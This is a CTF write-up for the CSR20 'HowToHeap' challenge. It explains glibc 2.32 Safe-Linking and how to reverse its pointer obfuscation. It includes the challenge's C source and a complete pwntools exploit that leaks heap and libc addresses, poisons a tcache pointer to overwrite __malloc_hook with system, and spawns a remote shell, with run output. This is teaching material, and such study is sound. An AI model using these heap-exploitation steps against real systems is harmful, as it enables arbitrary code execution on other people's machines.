HowToHeap was a medium rated challenge during the CyberSecurityRumble 2020 (CSR20) CTF. While not particular difficult, it allowed players to explore a new concept introduced with Libc 2.32: Safe-Linking.
In this writeup we will not only solve a CTF-Challenge, but also take a look at what at this new mitigation technique introduced in the latest glibc.
The solution shown in this writeup is not the shortest. You can avoid quite a few steps shown here, if you just want to get that sweet shell. The point of this writeup is to show how the new glibc hardening for single-linked lists work.
Starting out as usual we download the challenge files. We get a convenient docker-setup from which we can pull the
libc.so.6
, as well as the
ld.so
file. We also get the challenge binary (duh!) and the source (nice!). Doing our usual challenge prep:
1 2 3 4 5 6 7 8 9 | ❯ file libc-2.32.so
libc-2.32.so: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /usr/lib/ld-linux-x86-64.so.2, BuildID[sha1]=f45b67ab28af1581cba8e4713e0fd3b2bc004b2e, for GNU/Linux 3.2.0, not stripped
❯ checksec howtoheap
[*] '/home/galile0/ctf/csr20/howtoheap'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
|
All protections are enabled, but that shouldn't bother us too much, considering we are facing a heap challenge. Next up:
Source Review
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 | void malloc_one() {
uint16_t index;
size_t size;
printf("malloc at index: ");
if (fscanf(stdin, "%hu", &index) != 1)
fail("could not read index");
if (index >= MAX_ALLOCATIONS)
fail("index oob");
if (allocations[index])
fail("index already occupied");
printf("with size: ");
if (fscanf(stdin, "%lu", &size) != 1)
fail("could not read size");
allocations[index] = malloc(size);
if (!allocations[index])
fail("could not allocate memory");
}
void free_one() {
uint16_t index;
printf("free at index: ");
if (fscanf(stdin, "%hu", &index) != 1)
fail("could not read index");
if (index >= MAX_ALLOCATIONS)
fail("index oob");
if (!allocations[index])
fail("calling free on a nullptr");
free(allocations[index]);
allocations[index] = NULL;
}
void read_one() {
uint16_t index;
size_t size;
printf("read at index: ");
if (fscanf(stdin, "%hu", &index) != 1)
fail("could not read index");
if (index >= MAX_ALLOCATIONS)
fail("index oob");
if (!allocations[index])
fail("calling read on a nullptr");
printf("of size: ");
if (fscanf(stdin, "%lu", &size) != 1)
fail("could not read size");
if (write(STDOUT_FILENO, allocations[index], size) != size)
fail("read failed");
}
void write_one() {
uint16_t index;
size_t size;
printf("write to index: ");
if (fscanf(stdin, "%hu", &index) != 1)
fail("could not read index");
if (index >= MAX_ALLOCATIONS)
fail("index oob");
if (!allocations[index])
fail("calling write on a nullptr");
printf("of size: ");
if (fscanf(stdin, "%lu", &size) != 1)
fail("could not read size");
if (read(STDIN_FILENO, allocations[index], size) != size)
fail("write failed");
}
int main() {
setvbuf(stdin, 0, _IONBF, 0);
setvbuf(stdout, 0, _IONBF, 0);
setvbuf(stderr, 0, _IONBF, 0);
printf("how-to-heap\n> 0 => exit\n> 1 => malloc\n> 2 => free\n> 3 => read\n> 4 => write\n");
for(;;) {
uint8_t option;
printf("> ");
if (fscanf(stdin, "%hhu", &option) != 1)
fail("could not read menu option");
switch(option) {
case 0: return 0;
case 1: malloc_one(); break;
case 2: free_one(); break;
case 3: read_one(); break;
case 4: write_one(); break;
default: fail("invalid option");
}
}
}
|
Well shit. If this isn't a textbook heap playground. In case you can't be bothered to read the source (I feel you). We can:
- Have up to 0x400 Chunks allocated at the same time
- Allocate whatever size we want
- Read an arbitrary amount of data from a chunk (even out of bounds)
- Write arbitrary amount of data into a chunk (also out of bounds)
- No UAF or whatever bugs, but who cares
This basically gives us complete control over the heap, without having to abuse any arcane bugs.
Exploit Draft
To get going, I start with my usual template based on
pwntools
(All new and shiny in python 3) and just add the functions to interact with the binary:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 | #!/usr/bin/env python3
from pwn import *
#convenience Functions
convert = lambda x :x if type(x)==bytes else str(x).encode()
s = lambda data :io.send(convert(data))
sl = lambda data :io.sendline(convert(data))
sla = lambda delim,data :io.sendlineafter(convert(delim), convert(data), timeout=context.timeout)
ru = lambda delims, drop=True :io.recvuntil(delims, drop, timeout=context.timeout)
uu32 = lambda data :u32(data.ljust(4, b'\x00'))
uu64 = lambda data :u64(data.ljust(8, b'\x00'))
# Exploit configs
binary = ELF('howtoheap')
host = 'chal.cybersecurityrumble.de'
port = 8263
local_libc = ELF('/usr/lib/x86_64-linux-gnu/libc-2.31.so', checksec=False)
remote_libc = ELF('./libc-2.32.so', checksec=False)
ld = ELF('./ld-2.32.so', checksec=False)
def launch_gdb(breakpoints=[], cmds=[]):
if args.NOPTRACE:
return
info("Attaching Debugger")
cmds.append('handle SIGALRM ignore')
for b in breakpoints:
cmds.insert(0,'b *' + str(binary.address + b))
gdb.attach(io, gdbscript='\n'.join(cmds))
def add(idx, size):
sl(1)
sla(': ', idx)
sla(': ', size)
return ru('>')
def remove(idx):
sl(2)
sla(': ', idx)
return ru('>')
def show(idx,size):
sl(3)
sla(': ', idx)
sla(': ', size)
return ru('>')
def write(idx, size, data):
sl(4)
sla(': ', idx)
sla(': ', size)
s(data)
return ru('>')
if __name__ == '__main__':
# call with DEBUG to change log level
# call with NOPTRACE to skip gdb attach
# call with REMOTE to run against live target
one_gadget = [0xcda5a, 0xcda5d, 0xcda60]
if args.REMOTE:
args.NOPTRACE = True # disable gdb when working remote
io = remote(host, port)
libc = remote_libc
else:
io = process([ld.path, binary.path], env={'LD_PRELOAD': remote_libc.path})
libc = remote_libc
if not args.REMOTE:
for mmap in open('/proc/{}/maps'.format(io.pid),"rb").readlines():
mmap = mmap.decode()
if binary.path.split('/')[-1] == mmap.split('/')[-1][:-1]:
binary.address = int(mmap.split('-')[0],16)
break
io.interactive()
|
This script has some benefits for us: We can easily start a debugger and set breakpoints, even though the binary has PIE enabled. Going from here we will just add stuff to the bottom of the script. But what do we want to add anyway? Well, since we can read and write basically where ever we want, the easiest will be an attack on the
tcache fd
since this has the least amount of security checks. To do so, we need some chunks and leaks
Exploitation
Getting some leaks is easy. We have no UAF, but we can read out of bounds. Basically we add 2 Chunks, free the second, and read from the first with a size that also prints the header of the second chunk. While we are at it, lets also add a third chunk that's big enough to be out of TCache range, so that we can get some Libc leaks.
1 2 3 4 5 6 7 8 9 | add(0, 0x28) # Reference Chunk
add(1, 0x28) # We will overwrite FD here
add(2, 0x28) # Dummy chunk for illustration purpose
add(3, 0x800) # To get some LIBC-Leaks
add(4, 0x28) # Block against wilderness
remove(2) # again, illustration :D
remove(1) # Populate FD
remove(3) # Populate FD/BK with LIBC
|
Now, lets inspect the heap and see what we got:
1 2 3 4 5 6 7 | c = [
'file howtoheap',
'set $alloc=0x40c0+{}'.format(binary.address),
]
# Break at print_menu
launch_gdb(breakpoints=[0x1156], cmds=c)
|
We can simply use
x/4gx $alloc
to see the list of allocated chunks. I use this trick since GDB can be somewhat picky with debug symbols in a PIE binary using a preloaded glibc and
ld.so
(Complains about missing symbols everywhere). We see the following chunks:
You can see the four chunks highlighted. But something seems off, doesn't it? And that's not only why I added a dummy chunk , but also why I wrote up this article in the first place. The
FD
of chunk2 is all messed up! Time to take a detour into:
Safe-Linking
Getting to the core of the challenge, this is why we are here. Libc 2.32 introduced a new mitigation called Safe-Linking. You can (and in fact should) read about it here. Basically, the idea is that pointers get obfuscated by XORing them with the address they are storred at shifted by 12 bits. The following image from the article shows this quite well:
In this image, P is the FD pointer, and L is the address where it's stored at. Since the memory address is partially random, and we can't know it, we can't get the original pointer back, right? Well let's take a closer look.
We can easily see in the image that the first three nibbles (
0xBA9
) are not randomized. This is simply due to a shift of 12 bits to the left, so those values are xored with 0. Coolio. The next two nibbles (
0x87
of
P
) are xored with the first two (
0xBA
) which we know, cause they are still contained in the pointer
P'
. So we can reasonable recover the first 5 nibbles already. Now that we have 5 nibbles (
0xBA987
) of the original pointer
P
, we can take a look at the image again, and find that
0x98
is xored onto
0x65
of
P
giving us the next part of the obfuscated pointer. Since xor can easily be reversed, we can basically reverse this obfuscations starting with the 3 known nibbles and going in 4 bit chunks until we have a clear pointer again. To illustrate this, let's take the obfuscated Pointer
P'
and recover it step by step. We simply start with what we know:
1 2 3 4 | P' = 0x0000BA93DFD35753
L>>12 = 0x0000000BA9XXX???
XOR------------------------
P = 0x0000BA9XXX??????
|
As described, the first 3 nibbles of P are the same as for P' . Now, the next 3 nibbles, marked as X can be calculated with an XOR. Doing so gives us:
1 2 3 4 | P' = 0x0000BA93DFD35753
L>>12 = 0x0000000BA9876XXX
XOR------------------------
P = 0x0000BA9876XXX???
|
We can continue this, and calculate another 3 nibbles:
1 2 3 4 | P' = 0x0000BA93DFD35753
L>>12 = 0x0000000BA9876543
XOR------------------------
P = 0x0000BA9876543???
|
Recovering the final three nibbles is up to the reader :).
Implementing this in python looks like this:
1 2 3 4 5 6 7 8 9 10 | def defuscate(x,l=64):
p = 0
for i in range(l*4,0,-4): # 16 nibble
v1 = (x & (0xf << i )) >> i
v2 = (p & (0xf << i+12 )) >> i+12
p |= (v1 ^ v2) << i
return p
def obfuscate(p, adr):
return p^(adr>>12)
|
With this, we can easily de-obfuscate any leaks. Now, this would not be necessary for this challenge since we can also get a heap leak from the
tcache_per_thread
struct address. This works because safe-linking is only designed to protect single linked lists, and therefor is only applied to the
FD
pointer of fastbins and tcaches. But we absolutely need to obfuscate any
FD
we overwrite, i.e. overwriting fd with a plain address to
__malloc_hook
won't work. So in addition to a libc-leak we now also need a heap leak for attacks on tcache or fastbins. The pointer obfuscation is pretty useless though (for ctfs anyway). Also note that it is not applied on our UnsortedChunk of size 0x811 since this is not a single linked list and therefore not affected by this mitigation.
Does that mean this new mitigation useless? Far from it! In CTF scenarios it isn't too bad since you most likely can get a leak anyway. And given some leak, you can always deobfuscate the pointer and calculate any heap address you may need as an offset. But it mitigates some leakless techniques that rely on overwriting e.g. just the least significant byte. So in real-world scenarios this might add some protection, while in CTFs it's more of a nuisance.
Another mitigation they introduced is, that chunks in a single linked list have to be aligned to 0x10 boundaries. So no more abusing that address starting with
0x7f
for you fastbin dup exploit. This sucks, but we can just use tcaches which don't care about the size field.
Moving on
Now that we can de-obfuscate pointers and know how this new mitigation works, lets continue by getting some leaks. For this we can just read from the first chunk with enough bytes to dump the whole heap. And while we are at it, lets add some
one_gadgets
, you know the drill:
1 2 3 4 5 6 7 8 | leak = show(0, 0x1b8)
leak = show(0, 0x98)
heap_chunk1 = defuscate( uu64( leak[0x30:0x38] ) )
libc.address = uu64(leak[0x90:0x98])-0x1c2a60
success("Chunk1 @ 0x{:012x}".format(heap_chunk1))
success("LIBC @ 0x{:012x}".format(libc.address))
success("MHook @ 0x{:012x}".format(libc.symbols['__malloc_hook']))
one_g = libc.address + one_gadget[0]
|
Neat, that worked. Also note: The value of
heap_chunk1
is the address of
heap_chunk2
since this is the next free chunk. But when we overwrite the FD of chunk1 we actually need to xor it with the address of chunk1, not chunk2. But having the address of chunk2 allows us to calculate the address of chunk1 since the offset is fixed.
Overwrite malloc_hook
Since we can write arbitrary amounts of data, we just write into chunk0 and write out of bounds into the
fd
of chunk2. After we've done that, we can play the usual game of requesting our tcaches back to get a chunk at
__ malloc_hook
. Then we write the one_gadget there and done. Easy enough, let's go:
1 2 3 4 5 6 7 8 9 10 11 | # Overwrite Malloc Hook
p = b''
p += b'A'*0x28
p += p64(0x31) # Size field
p += p64(obfuscate(libc.symbols['__malloc_hook'], heap_chunk1-0x30))
write(0, len(p), p)
add(1, 0x28) # Use up chunk
add(2, 0x28) # This is the chosen one
write(2, 8, p64(one_g)) # Overwrite malloc Hook
|
And now if we trigger another malloc:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 | ./writeup.py NOPTRACE
[*] '/home/galile0/ctf/csr20/howtoheap'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Starting local process '/home/galile0/ctf/csr20/howtoheap/ld-2.32.so': pid 298893
[+] Chunk1 @ 0x7ffff7fff300
[+] LIBC @ 0x7ffff7df8000
[+] MHook @ 0x7ffff7fba9f0
[*] Attaching Debugger
[!] Skipping debug attach since context.noptrace==True
[*] Switching to interactive mode
$ 1
malloc at index: $ 9
with size: $ 1
[*] Got EOF while reading in interactive
$
[*] Process '/home/galile0/ctf/csr20/howtoheap/ld-2.32.so' stopped with exit code -11 (SIGSEGV) (pid 298893)
[*] Got EOF while sending in interactive
|
Well shit. But we have more gadgets to try, right? WRONG! Turns out none of the one_gadgets work. Well, fuck
Actually executing code
This was somewhat irritating at first, but there are other ways. We could for example try to leak the binary or stack address and ROP around. Or, we can just call system ¯_(ツ)_/¯.
And we can conveniently store our
/bin/sh
string on the heap at a known address. The question is how do we get the pointer to that address passed to
system
called by the
__malloc_hook
. Well the
__malloc_hook
is actually designed for debugging, and so get's passed the same argument as
malloc
. And this argument is of course the size we want to allocate. And since we have no size limitation, who stops us from passing a pointer value as a size parameter? So, our new plan:
- Overwrite malloc_hook with System
- Write /bin/sh into Chunk0
- pass the address of Chunk0 as a size parameter to malloc
- ???
- Profit
Making some adjustments to our script, the finished exploit looks like this:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 | #!/usr/bin/env python3
from pwn import *
#convenience Functions
convert = lambda x :x if type(x)==bytes else str(x).encode()
s = lambda data :io.send(convert(data))
sl = lambda data :io.sendline(convert(data))
sla = lambda delim,data :io.sendlineafter(convert(delim), convert(data), timeout=context.timeout)
ru = lambda delims, drop=True :io.recvuntil(delims, drop, timeout=context.timeout)
uu32 = lambda data :u32(data.ljust(4, b'\x00'))
uu64 = lambda data :u64(data.ljust(8, b'\x00'))
# Exploit configs
binary = ELF('howtoheap')
host = 'chal.cybersecurityrumble.de'
port = 8263
local_libc = ELF('/usr/lib/x86_64-linux-gnu/libc-2.31.so', checksec=False)
remote_libc = ELF('./libc-2.32.so', checksec=False)
ld = ELF('./ld-2.32.so', checksec=False)
def launch_gdb(breakpoints=[], cmds=[]):
if args.NOPTRACE:
return
info("Attaching Debugger")
context.terminal = ['tilix', '-a', 'session-add-right', '-e']
cmds.append('handle SIGALRM ignore')
for b in breakpoints:
cmds.insert(0,'b *' + str(binary.address + b))
gdb.attach(io, gdbscript='\n'.join(cmds))
def add(idx, size):
sl(1)
sla(': ', idx)
sla(': ', size)
return ru('>')
def remove(idx):
sl(2)
sla(': ', idx)
return ru('>')
def show(idx,size):
sl(3)
sla(': ', idx)
sla(': ', size)
return ru('>')
def write(idx, size, data):
sl(4)
sla(': ', idx)
sla(': ', size)
s(data)
return ru('>')
def defuscate(x,l=64):
p = 0
for i in range(l*4,0,-4): # 16 nibble
v1 = (x & (0xf << i )) >> i
v2 = (p & (0xf << i+12 )) >> i+12
p |= (v1 ^ v2) << i
return p
def obfuscate(p, adr):
return p^(adr>>12)
if __name__ == '__main__':
# call with DEBUG to change log level
# call with NOPTRACE to skip gdb attach
# call with REMOTE to run against live target
if args.REMOTE:
args.NOPTRACE = True # disable gdb when working remote
io = remote(host, port)
libc = remote_libc
else:
io = process([ld.path, binary.path], env={'LD_PRELOAD': remote_libc.path})
libc = remote_libc
if not args.REMOTE:
for mmap in open('/proc/{}/maps'.format(io.pid),"rb").readlines():
mmap = mmap.decode()
if binary.path.split('/')[-1] == mmap.split('/')[-1][:-1]:
binary.address = int(mmap.split('-')[0],16)
break
c = [
'file howtoheap',
'set $alloc=0x40c0+{}'.format(binary.address),
]
# Prepare Heap
add(0, 0x28) # Reference Chunk
add(1, 0x28) # We will overwrite FD here
add(2, 0x28) # Dummy chunk not actually needed
add(3, 0x800) # To get some LIBC-Leaks
add(4, 0x28) # Block against wilderness
# Get some Pointer
remove(2)
remove(1) # Populate FD
remove(3) # Populate FD/BK with LIBC
# Get some leaks
leak = show(0, 0x98)
heap_chunk1 = defuscate( uu64( leak[0x30:0x38] ) )
libc.address = uu64(leak[0x90:0x98])-0x1c2a60
success("Chunk1 @ 0x{:012x}".format(heap_chunk1))
success("LIBC @ 0x{:012x}".format(libc.address))
success("MHook @ 0x{:012x}".format(libc.symbols['__malloc_hook']))
# Overwrite Malloc Hook
p = b''
p += b'/bin/sh\x00'
p += b'A'*0x20
p += p64(0x31) # Size field
p += p64(obfuscate(libc.symbols['__malloc_hook'], heap_chunk1-0x30))
write(0, len(p), p)
add(1, 0x28) # Use up chunk
add(2, 0x28) # This is the chosen one
write(2, 8, p64(libc.symbols['system']))
launch_gdb(breakpoints=[0x1156], cmds=c) # Break at print_menu
# Trigger exploit
sl(1)
sl(3)
sl(heap_chunk1-0x60)
success('Enjoy your Shell')
sl('id')
io.interactive()
|
And running it of course:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 | ❯ ./writeup.py REMOTE
[*] '/home/galile0/ctf/csr20/howtoheap'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to chal.cybersecurityrumble.de on port 8263: Done
[+] Chunk1 @ 0x5624ac725300
[+] LIBC @ 0x7f5bbeb98000
[+] MHook @ 0x7f5bbed5a9f0
[+] Enjoy your Shell
[*] Switching to interactive mode
malloc at index: with size: uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
$ ls /home/ctf
flag.txt
howtoheap
|
Neat!
After the ctf, and seeing other solutions I realized that overwriting the
__free_hook
would have been just as easy. We could've written
/bin/sh
to an allocated chunk and then call free on it. But my brain is somewhat stuck at overwriting the __malloc_hook because I've done it so many times with fastbins that I just don't even look at the
__free_hook
:D
Lessons learned
This challenge was actually quite easy since there were absolutely no restrictions in place. But this allowed us to learn something about the new mitigation in Libc-2.32, called safe-linking. We learned that while safe-linking protects single linked lists, it does nothing for other types of chunks. We also saw how we can easily deobfuscate a leaked pointer, abusing the fact that the xored address is shifted 12 bits before it's xored.
Unfortunately, this wouldn't even have been necessary for solving the challenge since leaking the
tcache_per_thread
pointer would have been enough to calculate everything else. But I wanted to take this as an opportunity to show, how to bypass this obfuscation, in case you need it for a future ctf (hint: you will). Overall, it was a fun challenge, and even more important: A nice playground to get started in heap exploitation. I hope this writeup was understandable and you learned something following it. If you have any questions or find some errors, you can find me on Twitter